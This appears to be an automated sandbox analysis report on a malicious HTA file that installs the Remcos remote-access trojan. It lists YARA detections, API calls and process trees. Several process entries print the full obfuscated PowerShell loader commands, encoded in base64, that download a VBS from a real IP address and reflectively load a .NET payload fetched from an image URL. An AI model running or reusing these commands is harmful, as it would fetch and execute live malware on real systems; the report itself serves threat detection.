                    Source: 8.2.powershell.exe.90965d0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 8.2.powershell.exe.90965d0.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 8.2.powershell.exe.90965d0.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000008.00000002.2521285929.0000000009096000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: CasPol.exe PID: 6284, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winHTA@18/16@6/4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,12_2_00416AB7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,12_2_0040E219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041A64F FindResourceA,LoadResource,LockResource,SizeofResource,12_2_0041A64F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_00419BD4
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\creamykissinglipsgoodforcreamythingswithcreamicream[1].tiffJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-PVMSPM
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4416:120:WilError_03
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4856:120:WilError_03
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x3bb3oer.m1o.ps1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creamykissinglipsgoodforcreamythingswithcream.vbS"
                    Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: creamkissingthingswithcreambananapackagecreamy.htaVirustotal: Detection: 40%
                    Source: creamkissingthingswithcreambananapackagecreamy.htaReversingLabs: Detection: 23%
                    Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\creamkissingthingswithcreambananapackagecreamy.hta"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5305.tmp" "c:\Users\user\AppData\Local\Temp\yy1wu0jg\CSCCF35FBE9A0D8429B84CE9BA7B3CB93B6.TMP"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creamykissinglipsgoodforcreamythingswithcream.vbS"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $isohemolytic = 'JGNhc2VtYXRlZCA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRSYWRub3IgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRoZW1pYWJsZXBzaWEgPSAkUmFkbm9yLkRvd25sb2FkRGF0YSgkY2FzZW1hdGVkKTskYmlkZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkaGVtaWFibGVwc2lhKTska2lkZGllcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYXZlbnRhaWxlID0gJzw8QkFTRTY0X0VORD4+Jzskc3RhaW4gPSAkYmlkZXMuSW5kZXhPZigka2lkZGllcyk7JHJlc2h1ZmZsZSA9ICRiaWRlcy5JbmRleE9mKCRhdmVudGFpbGUpOyRzdGFpbiAtZ2UgMCAtYW5kICRyZXNodWZmbGUgLWd0ICRzdGFpbjskc3RhaW4gKz0gJGtpZGRpZXMuTGVuZ3RoOyRzdWJhY3V0ZWx5ID0gJHJlc2h1ZmZsZSAtICRzdGFpbjskYXJ0aHJhbGdpYSA9ICRiaWRlcy5TdWJzdHJpbmcoJHN0YWluLCAkc3ViYWN1dGVseSk7JHVuYWRzb3JiZWQgPSAtam9pbiAoJGFydGhyYWxnaWEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGFydGhyYWxnaWEuTGVuZ3RoKV07JG1pbnRsaWtlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5hZHNvcmJlZCk7JG1pbGxpbmVyID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWludGxpa2UpOyRwcm9kaWdhbCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRwcm9kaWdhbC5JbnZva2UoJG51bGwsIEAoJzAvQXpmOG8vci9lZS5ldHNhcC8vOnNwdHRoJywgJyRoZXRlcm9icmFuY2hpYScsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywgJ0Nhc1BvbCcsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnMScsJyRoZXRlcm9icmFuY2hpYScpKTs=';$choleate = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($isohemolytic));Invoke-Expression $choleate
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.cmdline"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creamykissinglipsgoodforcreamythingswithcream.vbS" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5305.tmp" "c:\Users\user\AppData\Local\Temp\yy1wu0jg\CSCCF35FBE9A0D8429B84CE9BA7B3CB93B6.TMP"Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $isohemolytic = 'JGNhc2VtYXRlZCA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRSYWRub3IgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRoZW1pYWJsZXBzaWEgPSAkUmFkbm9yLkRvd25sb2FkRGF0YSgkY2FzZW1hdGVkKTskYmlkZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkaGVtaWFibGVwc2lhKTska2lkZGllcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYXZlbnRhaWxlID0gJzw8QkFTRTY0X0VORD4+Jzskc3RhaW4gPSAkYmlkZXMuSW5kZXhPZigka2lkZGllcyk7JHJlc2h1ZmZsZSA9ICRiaWRlcy5JbmRleE9mKCRhdmVudGFpbGUpOyRzdGFpbiAtZ2UgMCAtYW5kICRyZXNodWZmbGUgLWd0ICRzdGFpbjskc3RhaW4gKz0gJGtpZGRpZXMuTGVuZ3RoOyRzdWJhY3V0ZWx5ID0gJHJlc2h1ZmZsZSAtICRzdGFpbjskYXJ0aHJhbGdpYSA9ICRiaWRlcy5TdWJzdHJpbmcoJHN0YWluLCAkc3ViYWN1dGVseSk7JHVuYWRzb3JiZWQgPSAtam9pbiAoJGFydGhyYWxnaWEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGFydGhyYWxnaWEuTGVuZ3RoKV07JG1pbnRsaWtlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5hZHNvcmJlZCk7JG1pbGxpbmVyID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWludGxpa2UpOyRwcm9kaWdhbCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRwcm9kaWdhbC5JbnZva2UoJG51bGwsIEAoJzAvQXpmOG8vci9lZS5ldHNhcC8vOnNwdHRoJywgJyRoZXRlcm9icmFuY2hpYScsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywgJ0Nhc1BvbCcsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnMScsJyRoZXRlcm9icmFuY2hpYScpKTs=';$choleate = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($isohemolytic));Invoke-Expression $choleateJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
